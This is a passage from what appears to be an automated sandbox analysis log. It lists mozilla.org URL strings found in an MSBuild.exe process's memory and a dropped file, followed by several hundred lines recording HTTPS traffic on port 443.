Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
